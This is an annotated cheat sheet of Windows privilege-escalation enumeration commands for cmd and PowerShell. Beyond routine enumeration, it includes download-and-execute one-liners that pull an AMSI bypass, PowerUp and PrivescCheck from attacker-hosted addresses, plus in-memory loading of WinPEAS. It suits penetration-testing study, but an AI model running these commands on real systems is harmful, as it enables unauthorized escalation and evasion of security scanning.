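# --- Windows privilege-escalation enumeration notes (cmd / PowerShell) ---
# Lines prefixed "PS>" are PowerShell; "> powershell" opens a PowerShell
# session from a cmd prompt. "<...>" marks a value to fill in.

# Check current username and their privileges
whoami
whoami /priv

# System information
# NOTE(review): "sysinfo" is not a native Windows command (it looks like a
# Meterpreter command); on a native Windows shell use "systeminfo".
sysinfo

# List disks
fsutil fsinfo drives

# Enumerate unmounted disks (volumes without a drive letter)
mountvol

# Check users and groups (local, then domain)
net user
net user /domain
net group
net group /domain

# Show info on a particular user
net user <username>

# Hostname
hostname

# AMSI bypass (from a PowerShell session started in cmd)
> powershell
PS> IEX (new-Object Net.WebClient).DownloadString('http://20.0.0.200/privesc/amsi.txt')
PS> IEX (new-Object Net.WebClient).DownloadString('http://20.0.0.200/privesc/my-am-bypass.ps1')

# WinPEAS from disk
./winPEASAny.exe

# WinPEAS in memory: the .NET assembly is loaded directly from the HTTP
# response bytes and its Main entry point is invoked.
PS> $url = "http://10.10.14.16/privesc/winPEASany.exe"
PS> $wp = [System.Reflection.Assembly]::Load([byte[]](Invoke-WebRequest "$url" -UseBasicParsing | Select-Object -ExpandProperty Content)); [winPEAS.Program]::Main("")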
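# List running services
# NOTE: in PowerShell "sc" is an alias for Set-Content, so call "sc.exe"
# explicitly (works from cmd as well). wmic is deprecated in recent Windows
# releases; Get-CimInstance Win32_Service is the replacement.
net start
sc.exe query
wmic service get
wmic service get Caption,Name,PathName,ServiceType,Started,StartMode,StartName

# Service configuration (binary path, start type, run-as account) and state
sc.exe qc <service name>
sc.exe query <service name>

# List running processes (with the services hosted by each)
tasklist /SVC
wmic process

# List all running processes owned by SYSTEM
tasklist /fi "USERNAME eq NT AUTHORITY\SYSTEM"
tasklist /fi "USERNAME eq NT AUTHORITY\SYSTEM" /fi "STATUS eq running"

# Check all listening ports (with owning PID)
netstat -ano

# Scheduled tasks: dump verbose list to a file, then filter it
schtasks /query /fo LIST /v > log.txt
cat log.txt | grep "admin \|Task To Run"
# (grep is not native to Windows; on a native shell use
#  findstr /i /c:"admin" /c:"Task To Run" log.txt, or Select-String in PowerShell)
schtasks /run /tn "taskname"

# Lists scheduled tasks only for the current user context;
# you need to be SYSTEM to see all tasks.
Get-ScheduledTask

# PowerShell to organize the information (one row per root-level task)
Get-ScheduledTask -TaskPath "\" | ForEach-Object {
  [pscustomobject]@{
    Server      = $env:COMPUTERNAME
    Name        = $_.TaskName
    Path        = $_.TaskPath
    Description = $_.Description
    Author      = $_.Author
    RunAsUser   = $_.Principal.userid
    LastRunTime = $(($_ | Get-ScheduledTaskInfo).LastRunTime)
    LastResult  = $(($_ | Get-ScheduledTaskInfo).LastTaskResult)
    NextRun     = $(($_ | Get-ScheduledTaskInfo).NextRunTime)
    Status      = $_.State
    Command     = $_.Actions.execute
    Arguments   = $_.Actions.Arguments
  }
}

# Patch info (installed hotfixes)
systeminfo
wmic qfe get Caption,Description,HotFixID,InstalledOn

# Run PrivescCheck.ps1 (from a PowerShell session started in cmd)
> powershell
PS> iex (new-Object Net.WebClient).DownloadString('http://10.10.14.127/privesc/PrivescCheck.ps1'); Invoke-PrivescCheck -Extended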
# Run PowerUp.ps1 (downloaded and evaluated in the current session)
PS>iex (new-Object Net.WebClient).DownloadString('http://192.168.49.124/privesc/PowerUp.ps1')|Import-Module PowerUp.ps1
PS>Invoke-AllChecks
# Run Windows Exploit Suggester NG
# Obtain systeminfo.txt from a Target machine
# (--update refreshes the local definitions; -e restricts output to entries with a known exploit)
./wes.py --update
./wes.py systeminfo.txt -e # only known exploit 
./wes.py systeminfo.txt # all vulnerabilities